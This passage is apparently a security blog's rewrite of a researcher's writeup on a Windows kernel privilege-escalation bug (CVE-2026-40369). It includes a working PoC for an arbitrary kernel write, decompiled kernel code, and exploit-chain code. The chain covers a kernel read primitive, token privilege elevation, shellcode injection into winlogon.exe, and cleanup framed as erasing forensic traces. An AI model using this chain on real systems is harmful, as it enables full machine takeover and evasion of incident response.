Windows Kernel EoP vulnerability CVE-2026-40369

CVE-2026-40369: Arbitrary Kernel Address Increment via NtQuerySystemInformation

Source & attribution. This post is an original English rewrite of “Arbitrary Kernel Address Increment via NtQuerySystemInformation (CVE-2026-40369)” by Ori Nimron (@orinimron123), published at pwn2nimron.com. The full exploit source lives at github.com/orinimron123/CVE-2026-40369-EXPLOIT. Shorter news-style coverage was also published by Daily CyberSecurity (securityonline.info). All IDA decompilations, the PoC source, the crash dump, the affected-versions table and the exploit-chain structure are credited to Ori Nimron; this post paraphrases the surrounding prose and adds editorial framing for engineers reading on core-jmp.org. Please read the canonical writeup and inspect the GitHub repository for ground truth.

Executive Summary

CVE-2026-40369 is a Windows kernel vulnerability in nt!ExpGetProcessInformation — the helper that backs the NtQuerySystemInformation syscall — that lets any unprivileged caller, including one trapped inside the Chrome renderer sandbox, perform three monotonically-increasing 32-bit writes at a kernel address of its choosing per syscall. The bug is reachable by passing information class 253 (SystemProcessInformationExtension) with Length=0: the kernel’s ProbeForWrite call is a no-op when the length argument is zero, so the user-mode pointer is never validated, and the per-process write loop runs against that pointer anyway.

Ori Nimron’s public writeup composes this single primitive into a clean SYSTEM exploit. He bumps the OOB-index gate CmpLayerVersionCount from 4 to 0xB, slides a NULL CmpLayerVersions entry into a controlled user-mode VirtualAlloc page, type-confuses it through an SEH-protected query path, and uses the Windows UTF-8 conversion path inside RtlUnicodeStringToAnsiString to convert the bug into an arbitrary kernel read. From there it is a short walk: EPROCESS traversal to locate the attacker’s own token, three DWORD increments at token+0x42 to light up bit 20 (SeDebugPrivilege) inside Token.Privileges.Enabled, VirtualAllocEx + CreateRemoteThread into winlogon.exe, and a SYSTEM shell. The author then cleans the count back to 4 via byte-wise LSB overflow, so the OS is left in a sane state with no obvious forensic trail. The whole chain is described as 100% deterministic, with no race condition, no heap spray, and no special tokens required.

[Figure: hero illustration accompanying the broader coverage of the bug. Source: securityonline.info.]

At a Glance

Field | Value
CVE | CVE-2026-40369 (CRITICAL, per the researcher’s advisory)
Researcher | Ori Nimron (@orinimron123)
OS | Windows 11, builds 26200.8039, 26200.8117, 26200.8246, 26200.8328 (24H2 to 25H2)
Component | ntoskrnl.exe: ExpGetProcessInformation (info class 253, SystemProcessInformationExtension)
Primitive | Three monotonically-increasing 32-bit increments at an attacker-controlled kernel address per syscall
Attack Vector | Local, any user, any integrity level, any sandbox
Privileges Required | None (callable from Untrusted Integrity)
Reliability | 100% deterministic; no race, no heap-spray
Disclosure | Full public disclosure after Pwn2Own Berlin 2026 capacity rejection
Public PoC | github.com/orinimron123/CVE-2026-40369-EXPLOIT
Summary of CVE-2026-40369 affected products and exploit reliability. Source: original article.

Preface: How the Bug Was Found

The author frames the discovery as a counter-intuitive scrutiny argument. He was preparing a Chrome-renderer-sandbox-escape entry for Pwn2Own Berlin 2026: the renderer runs at Untrusted Integrity with a restricted token, Win32k lockdown removes the entire GDI/USER attack surface, and what remains reachable is a narrow band of NT syscalls — file ops (broker-filtered), registry (largely read-only), and system-information queries. NtQuerySystemInformation is widely considered the most-audited syscall on the platform: hundreds of information classes, decades of patches, well-trodden territory. The author argues the inverse heuristic: code “everyone thinks has been thoroughly audited sometimes receives less scrutiny precisely because of that assumption.” He started disqualifying information classes inside IDA to clear them out and, within a day, landed on class 253 — structurally a sibling of the well-known class 5, sharing the same code path but missing one validation step.

The exploit was built end-to-end and registered for the Pwn2Own Berlin 2026 Web Browser category. ZDI rejected the submission citing capacity (over one hundred entries, no extra contest days). The author chose full public disclosure in lieu of the contest payout. No MSRC coordination timeline, CVSS vector, or patch identifier is published alongside the writeup; the only affected-builds list is the one reproduced in the table above.

The Bug

Entry Point: NtQuerySystemInformation at 0x140ae08a0

The syscall handler is a thin dispatcher: a small switch peels off the classes that need bespoke handling (8, 0x17, 0x2A) and explicitly blocks two more (0x6B and 0x79). Everything else falls through into the generic worker ExpQuerySystemInformation. Class 253 lands in that default branch.

void __fastcall NtQuerySystemInformation(
    unsigned int a1, _QWORD *a2, ULONG a3, ULONG *a4)
{
  switch ( a1 ) {
    // ... special cases for classes 8, 0x17, 0x2A, etc ...
    case 0x6Bu: case 0x79u: /* ... blocked classes ... */
      return;
    default:
      v9 = 0;
      ExpQuerySystemInformation(a1, NULL, 0, a2, a3, a4); // <- class 253 lands here
      return;
  }
}

The Vulnerable Function: ExpGetProcessInformation at 0x140ada6d0

Inside ExpGetProcessInformation, three sibling classes share most of the code: class 252 (compact info), class 253 (extension info), and class 5 (process info). The class-252 and class-5 paths store the user buffer into separate variables (pCompactInfo / pProcessInfo) and immediately clear the unused pExtensionOut to NULL at 0x140ada8bd. The class-253 path stores the user buffer into pExtensionOut at 0x140ada874 with no validation, then goto LABEL_11 — bypassing the clearing line below.

ExpGetProcessInformation(unsigned int *userBuffer, unsigned int length, ...)
{
  if ( infoClass == 252 ) {     // @ 0x140ada807
    pCompactInfo = userBuffer;  // class 252 uses pCompactInfo - safe path
    pProcessInfo = 0;
  }
  else {
    pCompactInfo = 0;           // @ 0x140ada83d
    if ( infoClass == 253 ) {   // @ 0x140ada84b
      entrySize = 12;           // entry size = 12 bytes (3 x DWORD)
      pExtensionOut = userBuffer; // @ 0x140ada874 - BUG! No validation!
      pProcessInfo = 0;
      goto LABEL_11;             // skip the pExtensionOut = 0 below
    }
    pProcessInfo = userBuffer;   // class 5 uses pProcessInfo - safe path
  }
  pExtensionOut = 0;            // @ 0x140ada8bd - class 5/252 clear it (safe)

LABEL_11:
  // Size check: does NOT return early on failure!
  if ( length < entrySize )      // @ 0x140ada8da - Length < 12?
    status = 0xC0000004;         // STATUS_INFO_LENGTH_MISMATCH (stored, not returned!)
  ...

The Write Primitive

The per-process iteration loop at 0x140adaa76 runs ExGetNextProcess until it reaches the tail of the process list. Inside the loop, when infoClass == 253, three writes happen against the pointer the user supplied:

  // Process iteration - executes for EVERY process on the system
  while ( NextProcess ) {                              // @ 0x140adaa76
    if ( infoClass == 253 ) {                           // @ 0x140adaaf6
      ++*pExtensionOut;                                 // @ 0x140adaafe: *(DWORD*)(addr+0) += 1
      pExtensionOut[1] += PsGetProcessActiveThreadCount(NextProcess); // addr+4
      pExtensionOut[2] += ObGetProcessHandleCount(NextProcess, 0);   // addr+8
    }
    // ... class 5/252 paths with proper bounds checking ...
    NextProcess = ExGetNextProcess(NextProcess, restricted); // @ 0x140adb9e4
  }

That is the entire vulnerability in three lines: ++*pExtensionOut, pExtensionOut[1] += thread_count, pExtensionOut[2] += handle_count. The fixed entry size 12 in r14 (visible in the crash dump below) is the structural fingerprint of class 253; everything downstream of the dispatch is generic per-process aggregation.

Why the Writes Happen Despite Length=0

The length check at 0x140ada8d3 / 0x140ada8da looks superficially correct: it compares length against the per-class entrySize (12 for class 253). But the early-return is gated on the returnLength output pointer being NULL. In a realistic caller (the PoC passes &needed), returnLength is non-null, so the routine stores 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH) into a local status variable and continues. All three increment writes execute before the error status is finally returned. The ProbeForWrite call earlier in the path is itself a no-op when Length=0, because its body is wrapped in if (Length). Net effect: an attacker-supplied kernel pointer reaches the write loop with zero validation.

  lengthTooSmall = length < entrySize;       // @ 0x140ada8d3 - Length (0) < 12? YES
  if ( length < entrySize ) {                // @ 0x140ada8da
    if ( !returnLength )                     // only returns if ReturnLength ptr is NULL
      return 0xC0000004;                    // STATUS_INFO_LENGTH_MISMATCH
  }
  status = lengthTooSmall ? 0xC0000004 : 0; // stores error in status... but continues!
  // Execution falls through into the process iteration loop
  // The writes at pExtensionOut happen BEFORE this status is ever returned
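The ordering problem described above can be reproduced in a small user-space model. The sketch below is not kernel code: model_process, model_flawed, model_checked and the MODEL_* constants are hypothetical names invented for illustration, and the handling of return_length is a modelling assumption. It only shows that recording the length mismatch in a local variable, instead of returning on it, lets the aggregation loop run on a zero-length buffer, and what one possible corrected shape looks like.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_STATUS_SUCCESS              0x00000000u
#define MODEL_STATUS_INFO_LENGTH_MISMATCH 0xC0000004u
#define MODEL_ENTRY_SIZE                  12u  /* three DWORDs, as for class 253 */

/* Hypothetical stand-in for one process record; not a kernel structure. */
typedef struct {
    uint32_t threads;
    uint32_t handles;
} model_process;

/* Mirrors the flawed ordering: the mismatch is recorded, not returned. */
uint32_t model_flawed(uint32_t *out, uint32_t length, uint32_t *return_length,
                      const model_process *procs, size_t count)
{
    assert(out != NULL && (procs != NULL || count == 0));
    if (length < MODEL_ENTRY_SIZE && return_length == NULL)
        return MODEL_STATUS_INFO_LENGTH_MISMATCH;    /* the only early exit */

    uint32_t status = (length < MODEL_ENTRY_SIZE)
                          ? MODEL_STATUS_INFO_LENGTH_MISMATCH
                          : MODEL_STATUS_SUCCESS;

    for (size_t i = 0; i < count; ++i) {             /* runs even when length == 0 */
        out[0] += 1;
        out[1] += procs[i].threads;
        out[2] += procs[i].handles;
    }
    if (return_length != NULL)
        *return_length = MODEL_ENTRY_SIZE;           /* modelling assumption */
    return status;
}

/* One possible corrected shape: never touch `out` when the buffer is short. */
uint32_t model_checked(uint32_t *out, uint32_t length, uint32_t *return_length,
                       const model_process *procs, size_t count)
{
    assert(out != NULL && (procs != NULL || count == 0));
    if (return_length != NULL)
        *return_length = MODEL_ENTRY_SIZE;
    if (length < MODEL_ENTRY_SIZE)
        return MODEL_STATUS_INFO_LENGTH_MISMATCH;    /* return before any write */

    for (size_t i = 0; i < count; ++i) {
        out[0] += 1;
        out[1] += procs[i].threads;
        out[2] += procs[i].handles;
    }
    return MODEL_STATUS_SUCCESS;
}
```

With three model processes and length 0, model_flawed returns the mismatch status and still modifies all three counters, while model_checked returns the same status and leaves the buffer untouched.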

Proof of Concept

The minimal PoC is short. It points the syscall at an arbitrary kernel address 0xffff800041424344 and lets the kernel increment three DWORDs there once per process. If the target is mapped writable kernel memory, three increments happen; if it is unmapped, the kernel faults on the first inc dword ptr [rbx] and blue-screens.

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;
#define SystemProcessInformationExtension 253

typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG, PVOID, ULONG, PULONG);

int main(void)
{
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    PVOID target = (PVOID)0xffff800041424344ULL;  // any kernel address

    ULONG needed = 0;
    NTSTATUS status = pNtQSI(
        253,       // SystemProcessInformationExtension
        target,    // kernel address - ProbeForWrite skipped because Length=0
        0,         // Length=0 bypasses ProbeForWrite entirely
        &needed
    );
    // If target is mapped writable kernel memory:
    //   *(DWORD*)(target+0) += number_of_processes
    //   *(DWORD*)(target+4) += total_thread_count
    //   *(DWORD*)(target+8) += total_handle_count
    // If target is unmapped -> BSOD (kernel fault on write)

    printf("[*] status: 0x%08lX | needed: %lu\n", status, needed);
    return 0;
}

The crash dump from a kernel debugger when the supplied address is not mapped confirms the primitive: the fault is inc dword ptr [rbx] at nt!ExpGetProcessInformation+0x42e, with rbx equal to the user-supplied address, r14 = 0xC (the class-253 entry size of 12), and r15 holding the EPROCESS of the in-flight iteration:

PROCESS_NAME: poc.exe

nt!ExpGetProcessInformation+0x42e:
fffff801`d7adb22e ff03   inc dword ptr [rbx]   ; rbx = 0xffff800041424344

Registers:
  rbx = 0xffff800041424344 (attacker-supplied kernel address, pExtensionOut)
  r14 = 0xC (= 12 = per-entry size, confirms class 253 path)
  r15 = fffff801d7fcef00 (EPROCESS of current iteration)

Stack:
  nt!ExpGetProcessInformation+0x42e
  nt!ExpQuerySystemInformation+0xd7f
  nt!NtQuerySystemInformation+0x91
  nt!KiSystemServiceCopyEnd+0x25
  ntdll!NtQuerySystemInformation+0x14

Sandbox Escape Implications

The set of mitigations the Chrome renderer (and Edge / Firefox content processes) sandboxes rely on does not stop this syscall:

  • Win32k lockdown — doesn’t apply; this is an NT syscall, not Win32k.
  • Restricted tokens — no privilege check is performed for this information class.
  • Untrusted Integrity — no integrity check is performed on the call path.
  • Sandbox brokers — do not mediate NtQuerySystemInformation.

The operational impact, as the author states explicitly: any compromised renderer process — reached via a V8 or SpiderMonkey RCE, for instance — can chain directly into SYSTEM. The sandbox boundary contributes zero defence-in-depth against this primitive.

Full Exploit Chain

The composed chain in the public repository moves from KASLR leak through corrupted layer-version count, into a type-confused arbitrary kernel read, into a token-privilege bitmask increment, and finally into a code-injection step against a SYSTEM process. The cleanup step at the end restores CmpLayerVersionCount to its original value of 4. Each stage is briefly outlined below; the GitHub repository has the running code.

Step 1: KASLR Bypass via prefetch-tool

The first dependency is knowing where in kernel memory to write. The author uses the public prefetch-tool — a pure user-mode timing side-channel utility — to leak the ntoskrnl.exe base address. No kernel interaction is required for this stage.

Step 2: Arbitrary Kernel Read via CmpLayerVersions Type Confusion

The write primitive on its own is one-way: increment-only. To turn it into a read, the author exploits a second piece of kernel state — the CmpLayerVersions array used by configuration-manager build-version queries (info class 222). The array is fixed-size 16 entries, but only indices [0..3] are populated at runtime; indices [4..15] are perpetual NULL pointers. The gate that stops a caller from indexing beyond 3 is CmpLayerVersionCount itself.

Phase 1 — Unlock the OOB index. Bump CmpLayerVersionCount from 0x04 to 0x0B by aiming the write primitive at ntos + RVA_CmpLayerVersionCount - 11. With that offset, the first two writes (addr+0, addr+4) fall entirely before the count, and the third write (addr+8) covers the three bytes preceding the count plus the count’s low byte. Subtracting 11 therefore ensures that only the count’s low byte is mutated, so the increment is fine-grained. After ~7 calls the count reads 0x0B and index 9 is reachable.

Phase 2 — Slide a NULL pointer into user space. With index 9 reachable, point the write primitive at the storage of CmpLayerVersions[9]. The pointer is currently NULL; each syscall adds the current process count (~80–100) to the low DWORD. After enough calls the pointer drifts up into the range 0x10000–0x1FFFF, i.e. into a 64KB allocation the exploit can place there with VirtualAlloc(0x10000, 0x10000). The exact landing offset inside that allocation fluctuates, so it has to be detected.

Phase 3 — Detect the landing. Pre-fill the 64KB allocation with a sequential DWORD pattern (p[i] = i), then issue an info-class-222 query with index 9. The kernel dereferences the corrupted pointer, treats whatever is there as a FAKE_VERSION_STRUCT, and copies Field_04 from it to the output buffer. Search the user allocation for that DWORD — the unique pattern reveals the exact byte offset the pointer landed at.

// 1. Fill 64KB with unique pattern: p[i] = i
FillAllocationWithUniqueDwordPattern(p, 0x10000);

// 2. Query class 222, index 9 - kernel reads Field_04 from our fake struct
//    The returned Field_04 will be whatever DWORD was at landing+4
query_build_info(QUERY_INDEX, &info);

// 3. The value in info.Field_04 IS the pattern DWORD at the landing offset
//    Search our allocation to find it:
confusion = detect_address(p, 0x10000, info.Field_04);
//    Now we know the EXACT byte offset where the pointer landed
//    and can write our FAKE_VERSION_STRUCT at that address

Why this never BSODs. The address ranges the corrupted pointer can touch divide cleanly into faulting and non-faulting zones, and the configuration-manager query path wraps the dereference in a Windows SEH frame:

Range | Mapping | Outcome
0x00000000-0x0000FFFF | Unmapped user space | Fault → caught by __try/__except → returns error
0x00010000-0x0001FFFF | The exploit’s 64KB VirtualAlloc | Dereference succeeds → kernel reads the fake struct
0x00020000+ | Unmapped user space | Fault → caught → returns error
0xFFFF8000… upward | Kernel address space | Would BSOD, but the pointer starts at 0 and never reaches here
The four zones the corrupted CmpLayerVersions[9] pointer can drift through. Source: original article.

  __try {
    ProbeForWrite(userBuffer, Length, 4);  // validates OUTPUT buffer
    ...
    CmQueryBuildVersionInformation(&idx, ...);
    //   ^^ inside here: pVersionStruct = CmpLayerVersions[idx]
    //   If pVersionStruct points to unmapped usermode addr -> ACCESS_VIOLATION
    //   The kernel CANNOT distinguish between:
    //     - "legitimate ptr to a page that got swapped out"
    //     - "corrupted ptr that was never valid"
    //   It's a usermode address, so it's treated as a normal fault.
  }
  __except(EXCEPTION_EXECUTE_HANDLER) {
    return GetExceptionCode();  // STATUS_ACCESS_VIOLATION -> returned to caller
    // No crash. No BSOD. Just an error code.
  }
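The four zones in the table above amount to a simple range classification. The sketch below is a user-space illustration only: pointer_zone and classify_pointer are hypothetical names, the kernel boundary constant is taken from the table's "0xFFFF8000… upward" row, and the model assumes (as the table does) that every user-space address outside the 64KB allocation is unmapped.

```c
#include <assert.h>
#include <stdint.h>

typedef enum {
    ZONE_UNMAPPED_LOW,   /* below the allocation: fault, caught by SEH        */
    ZONE_ALLOCATION,     /* inside the allocation: dereference succeeds       */
    ZONE_UNMAPPED_HIGH,  /* above the allocation, still user space: caught    */
    ZONE_KERNEL          /* kernel address space: not recoverable by the SEH  */
} pointer_zone;

/* Classify a pointer value against a single user-space allocation. */
pointer_zone classify_pointer(uint64_t p, uint64_t alloc_base, uint64_t alloc_size)
{
    assert(alloc_size != 0 && alloc_base + alloc_size > alloc_base);
    if (p >= 0xFFFF800000000000ull)
        return ZONE_KERNEL;
    if (p < alloc_base)
        return ZONE_UNMAPPED_LOW;
    if (p < alloc_base + alloc_size)
        return ZONE_ALLOCATION;
    return ZONE_UNMAPPED_HIGH;
}
```

For the values in the table, classify_pointer(p, 0x10000, 0x10000) places 0x8000 in the low unmapped zone, 0x10000 through 0x1FFFF in the allocation, and 0x20000 in the high unmapped zone.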

This is also where the writeup makes its most pointed cross-OS observation: Windows does not enforce SMAP. The kernel routinely dereferences user-mode pointers; it relies on SEH to recover from invalid ones, not on hardware mode separation. On platforms with SMAP enforcement (modern Linux, macOS) this user-mode-pointer-confusion technique is structurally impossible. Microsoft is reported as working on SMAP enforcement for Windows.

Phase 4 — Craft the fake version struct. At the detected offset write a FAKE_VERSION_STRUCT whose layout aligns with what CmQueryBuildVersionInformation expects: 16 bytes of header (four DWORDs) at +0x00, then a UNICODE_STRING us1 at +0x10 with Length=2, MaxLength=2, and Buffer = TARGET_KERNEL_ADDR. Three more zeroed UNICODE_STRINGs follow (us5/us6/us2…us4), and a sentinel field at +0x320 is set to zero.

When class 222 is queried with index 9, the kernel chases the corrupted pointer into the fake struct, reads us1, calls CmpQueryDowncastString(output+10, 128, &us1), follows us1.Buffer (which the exploit set to TARGET_KERNEL_ADDR), reads 2 bytes from that kernel address, runs them through RtlUnicodeStringToAnsiString, and copies the result into the output buffer the caller controls.

Why the PEB Must Be Set to UTF-8

The conversion path inside RtlUnicodeStringToAnsiString at 0x1408a9800 has a code-page-dependent fork at 0x1408a9842. If the process is detected as UTF-8 (RtlpIsUtf8Process() returns true), the function calls RtlUnicodeToUTF8N — a lossless encoder for the entire Basic Multilingual Plane. If the process is ANSI, the function falls back to a WideCharTable[] lookup that is many-to-one and collapses most input wchar_t values to 0x3F ('?') — a destructive operation that obliterates the read primitive.

  if ( RtlpIsUtf8Process(0) )       // @ 0x1408a9842 - checks process code page
  {
    RtlUnicodeToUTF8N(dst, max,       // UTF-8 path: LOSSLESS encoding
        &actualLen, src, srcLen);      // every wchar round-trips perfectly
  }
  else
  {
    // ANSI path: uses WideCharTable[] lookup
    while ( count < max ) {
      dst[count] = WideCharTable[src[count]]; // LOSSY! many wchars -> 0x3F ('?')
      ++count;
    }
  }

RtlpIsUtf8Process at 0x1408aa170 checks three locations for the UTF-8 codepage magic 0xFDE9: the silo-global ACP at SiloGlobals+0x408, the silo-global OEMCP at SiloGlobals+0x448, and the per-process PEB’s ActiveCodePage field at PEB+0x34C. The third one is what the exploit can set from user space:

  // Check 1: silo-global ACP
  if ( *(WORD*)(SiloGlobals + 0x408) == 0xFDE9 )  return true;
  // Check 2: silo-global OEMCP
  if ( *(WORD*)(SiloGlobals + 0x448) == 0xFDE9 )  return true;
  // Check 3: per-process PEB ActiveCodePage
  if ( *(WORD*)(PEB + 0x34C) == 0xFDE9 )         return true;  // <- this is what we set
  return false;

void SetProcessUtf8(void)
{
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    *(USHORT*)((BYTE*)peb + 0x34C) = 0xFDE9;  // ActiveCodePage = UTF-8
}

Path | Steps | Outcome
ANSI code page (default, Windows-1252) | Read 0x48 0x8B → wchar U+8B48 → WideCharTable lookup → 0x3F (?) | Lossy: most wchars collapse to ?
UTF-8 code page (0xFDE9) | Read 0x48 0x8B → wchar U+8B48 → RtlUnicodeToUTF8N → 0xE8 0xAD 0x88 | Lossless: every wchar U+0000–U+FFFF round-trips in 1–3 bytes; surrogates emit U+FFFD
ANSI vs UTF-8 conversion path inside RtlUnicodeStringToAnsiString. Source: original article.
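The UTF-8 row of the table can be checked by hand with a generic encoder. The sketch below is standard UTF-8 encoding of a single UTF-16 code unit, written in portable C; it is not the RtlUnicodeToUTF8N implementation, and utf16_unit_to_utf8 and utf8_to_utf16_unit are hypothetical helper names. It shows why a non-surrogate code unit survives the round trip while a lone surrogate is replaced by U+FFFD.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Encode one UTF-16 code unit as UTF-8; a lone surrogate becomes U+FFFD.
   Returns the number of bytes written (1 to 3). */
size_t utf16_unit_to_utf8(uint16_t unit, uint8_t out[3])
{
    assert(out != NULL);
    uint32_t cp = unit;
    if (cp >= 0xD800 && cp <= 0xDFFF)
        cp = 0xFFFD;                            /* the original value is lost here */
    if (cp < 0x80) {
        out[0] = (uint8_t)cp;
        return 1;
    }
    if (cp < 0x800) {
        out[0] = (uint8_t)(0xC0 | (cp >> 6));
        out[1] = (uint8_t)(0x80 | (cp & 0x3F));
        return 2;
    }
    out[0] = (uint8_t)(0xE0 | (cp >> 12));
    out[1] = (uint8_t)(0x80 | ((cp >> 6) & 0x3F));
    out[2] = (uint8_t)(0x80 | (cp & 0x3F));
    return 3;
}

/* Decode a 1-3 byte sequence produced by the encoder above. */
uint16_t utf8_to_utf16_unit(const uint8_t *in, size_t len)
{
    assert(in != NULL && len >= 1 && len <= 3);
    if (len == 1)
        return in[0];
    if (len == 2)
        return (uint16_t)(((in[0] & 0x1F) << 6) | (in[1] & 0x3F));
    return (uint16_t)(((in[0] & 0x0F) << 12) | ((in[1] & 0x3F) << 6) | (in[2] & 0x3F));
}
```

Encoding 0x8B48 yields the three bytes 0xE8 0xAD 0x88 from the table, and decoding them returns 0x8B48; encoding 0xD800 yields 0xEF 0xBF 0xBD, the encoding of U+FFFD.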

One residual issue: the UTF-16 to UTF-8 conversion replaces the surrogate range 0xD800–0xDFFF with U+FFFD. If the two bytes being read happen to encode a surrogate, the data is lost. The mitigation is to read pairs of overlapping [i-1, i] and [i+1, i+2] — pair each unknown byte with a known neighbour so the combined high byte is almost never in surrogate range. The fallback — three consecutive surrogate-range high bytes — has a probability around 1/32^3 ≈ 0.003%, low enough to never matter on real kernel data.

The read target function is CmQueryBuildVersionInformation at 0x140a44a80; the corrupted pointer load is at 0x140a44ae4. The four downcast calls feed off pVersionStruct+4, +16, +20, +24 with destination offsets output+10, +74, +138, +202 and a maximum length of 128:

__int64 __fastcall CmQueryBuildVersionInformation(int *inputBuffer, int a2, _WORD *output, ...)
{
  layerIdx = *inputBuffer;                  // attacker-controlled index
  if ( layerIdx >= CmpLayerVersionCount )  // bounds check (we incremented this!)
    return STATUS_INVALID_PARAMETER;

  pVersionStruct = CmpLayerVersions[layerIdx]; // @ 0x140a44ae4 - corrupted pointer!
                                                // Points into our usermode allocation
  *(DWORD*)(output + 1) = *pVersionStruct;     // copies DWORDs from fake struct
  *(DWORD*)(output + 2) = pVersionStruct[1];
  *(DWORD*)(output + 3) = pVersionStruct[2];
  *(DWORD*)(output + 4) = pVersionStruct[3];

  // These calls follow our crafted UNICODE_STRING.Buffer pointers:
  CmpQueryDowncastString(output+10,  128, pVersionStruct+4);  // reads from our target kernel addr!
  CmpQueryDowncastString(output+74,  128, pVersionStruct+16);
  CmpQueryDowncastString(output+138, 128, pVersionStruct+20);
  CmpQueryDowncastString(output+202, 128, pVersionStruct+24);
  ...
}

NTSTATUS __fastcall CmpQueryDowncastString(char *outputBuf, USHORT maxLen, UNICODE_STRING *srcString)
{
  if ( srcString->Buffer && srcString->Length ) { // our fake UNICODE_STRING
    dest.Buffer = outputBuf;                       // output buffer (usermode-visible)
    dest.MaximumLength = maxLen;
    RtlUnicodeStringToAnsiString(                  // converts UTF-16 -> ANSI/UTF-8
        &dest, srcString, 0);                      // reads from srcString->Buffer (kernel addr!)
  }
}

Step 3: Token Privilege Escalation

With an arbitrary kernel-read primitive and the original arbitrary-increment primitive, the path to SYSTEM is mechanical. Walk the ActiveProcessLinks chain starting from PsInitialSystemProcess; for each EPROCESS, read the UniqueProcessId at +0x1D0; when the PID matches the current process, read the Token field at +0x248 and AND with ~0xF to strip the EX_FAST_REF refcount bits. The kernel address of the attacker’s own access token is now known.

// Read PsInitialSystemProcess -> System EPROCESS address
kernel_read(ntos + RVA_PsInitialSystemProcess, 8, &system_eprocess);

// Follow ActiveProcessLinks.Flink chain
current = system_eprocess + 0x1D8;  // head of list
while (current != head) {
    eprocess = current - 0x1D8;       // CONTAINING_RECORD
    kernel_read(eprocess + 0x1D0, 8, &pid);
    if (pid == GetCurrentProcessId()) {
        // Found our EPROCESS!
        kernel_read(eprocess + 0x248, 8, &token_ref);
        token = token_ref & ~0xF;   // strip EX_FAST_REF refcount bits
        break;
    }
    kernel_read(current, 8, &current); // follow Flink
}

Inside the _TOKEN structure, the Privileges sub-struct sits at +0x40: Present at +0x40, Enabled at +0x48, EnabledByDefault at +0x50. SeDebugPrivilege corresponds to bit 20 of Privileges.Enabled, which is bit 4 of byte 2 (token+0x4A). Aiming the class-253 primitive at token+0x42 lands the three DWORD writes at token+0x42, +0x46, +0x4A, so the low byte of the third write, the one that accumulates handle counts, coincides with the byte that holds bit 20. After enough iterations bit 20 is set and the process gains SeDebugPrivilege; the readiness check is just OpenProcess(PROCESS_ALL_ACCESS, winlogon_pid).
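The offset arithmetic in the paragraph above (bit 20 of a field at +0x48 is bit 4 of the byte at +0x4A) follows from little-endian byte order and can be checked mechanically. The helper below is a generic sketch; bit_location and locate_bit are hypothetical names and nothing in it is specific to Windows.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t byte_offset;  /* offset from the start of the containing object */
    uint8_t  mask;         /* mask of the bit within that byte               */
} bit_location;

/* Locate bit `bit_index` of a little-endian 64-bit field at `field_offset`. */
bit_location locate_bit(uint32_t field_offset, unsigned bit_index)
{
    assert(bit_index < 64);
    bit_location loc;
    loc.byte_offset = field_offset + bit_index / 8;
    loc.mask = (uint8_t)(1u << (bit_index % 8));
    return loc;
}
```

Calling locate_bit(0x48, 20) gives byte offset 0x4A and mask 0x10, matching the figures quoted in the text.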

Step 4: Code Injection into a SYSTEM Process

With SeDebugPrivilege enabled, the rest is a textbook Windows post-exploitation sequence: OpenProcess against winlogon.exe, VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory to drop a 272-byte Metasploit-style cmd.exe-spawning stub, and CreateRemoteThread to run it. The author notes that kernel-mode shellcode execution is also possible by corrupting function pointers or dispatch tables — but Pwn2Own only requires sandbox escape to SYSTEM, so the simpler token-injection path was chosen.

Cleanup: Restoring CmpLayerVersionCount

After the chain runs, CmpLayerVersionCount is somewhere around 0x0B rather than its baseline 0x04 — an obvious anomaly in any post-incident analysis, and a real stability risk because legitimate class-222 callers can now index entries [4..10] that contain whatever garbage Phase 2 left behind. The exploit fixes this with the same primitive that broke it. Since only the LSB matters, it keeps incrementing the low byte (with carry-in from the third DWORD write) until the byte overflows past 0xFF and wraps cleanly back to 0x04. The other three bytes were never written, so they remain 0x00; the final DWORD reads 0x00000004 — bit-identical to the pre-exploit state.

// After exploitation: CmpLayerVersionCount LSB is corrupted (e.g. 0x0B)
// Keep incrementing - LSB carries up by ~1-3 per call
// Eventually wraps: ... -> 0xFE -> 0xFF -> 0x00 -> 0x01 -> ... -> 0x04
while (get_version_count() != 4)
{
    write_at(ntos_base + RVA_CmpLayerVersionCount - 11);
}
// CmpLayerVersionCount == 0x00000004 - fully restored
// System stable, no evidence of corruption

Approach | Range to wrap | Calls | Time | Risk
Direct DWORD increment (target = Count) | 0x00000004 → 0xFFFFFFFF → 0x00000004 | ~43,000,000 | hours | non-deterministic; may skip 4
LSB only (target = Count − 11) | 0x0B → 0xFF → 0x04 | ~80–200 | < 1 second | fine-grained (1–3 per call); lands on 4 reliably
Why the cleanup targets Count − 11 instead of Count directly. Source: original article.
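The numbers in the table can be sanity-checked with a few lines of arithmetic. The sketch below is illustrative only, with hypothetical helper names: it computes the wrap distance of an 8-bit counter, the number of calls a full 32-bit wrap would need at an assumed rate of about 100 increments per call, and which byte of a 12-byte, three-DWORD window overlaps a variable that starts a given number of bytes after the window base.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Increments needed to move an 8-bit counter from `from` to `to`, wrapping at 256. */
unsigned wrap_distance_u8(uint8_t from, uint8_t to)
{
    return (unsigned)(uint8_t)(to - from);
}

/* Calls needed to wrap a 32-bit counter once at `per_call` increments per call. */
uint64_t calls_for_dword_wrap(uint32_t per_call)
{
    assert(per_call != 0);
    return (1ull << 32) / per_call;
}

/* For a window of three DWORDs that starts `back` bytes before a variable,
   report which DWORD (0-2) and which byte inside it (0 = least significant)
   coincides with the variable's first byte. */
void overlap_of_first_byte(unsigned back, unsigned *dword_index, unsigned *byte_in_dword)
{
    assert(back < 12 && dword_index != NULL && byte_in_dword != NULL);
    *dword_index = back / 4;
    *byte_in_dword = back % 4;
}
```

Going from 0x0B back to 0x04 takes 249 single increments of the low byte, a full DWORD wrap at roughly 100 increments per call takes about 42.9 million calls, and with a window base 11 bytes before the count the count's low byte is byte 3 of DWORD 2, the most significant byte of the third write.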

A Note on Patch Status

